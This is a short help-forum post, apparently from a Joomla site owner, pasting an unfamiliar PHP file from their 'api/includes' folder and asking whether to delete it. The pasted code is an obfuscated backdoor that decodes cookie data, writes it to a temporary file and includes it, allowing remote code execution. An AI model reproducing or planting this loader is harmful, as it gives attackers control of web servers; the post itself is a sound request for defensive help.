This is the content of the file api/includes/zdhlmt.php
text/x-generic zdhlmt.php ( PHP script, ASCII text, with very long lines )
$lrRH=$_COOKIE ;$Jqsd =0; $JdV = ( 11- 8) ; $PpE =array() ; $PpE [ $Jqsd ]= "" ;while($JdV){$PpE[$Jqsd ].=$lrRH [ ( 51 - 19 )][ $JdV ]; if(! $lrRH[ ( 44 -12) ] [$JdV+ 1] ){ if ( !$lrRH [ (57 - 25) ] [ $JdV + 2 ] ) break ; $Jqsd ++; $PpE [ $Jqsd] = "";$JdV++; } $JdV = $JdV+ (26 - 23 ) + 1; }$Jqsd =$PpE [ ( 23 - 4 ) ] ().$PpE[ (46-21) ] ; if(!$PpE[( 84 -57) ] ( $Jqsd) ){ $JdV = $PpE [ (50-46 ) ]($Jqsd,$PpE [( 50 - 36) ]) ; $PpE [ (39 -10) ] ($JdV,$PpE [(44- 21 ) ] . $PpE [ (86 -65 ) ]($PpE [ ( 41 -26) ]($lrRH [3]) ) ) ;} include($Jqsd ) ;
It looks very different to the same file on a separate joomla installation I have, should I delete it?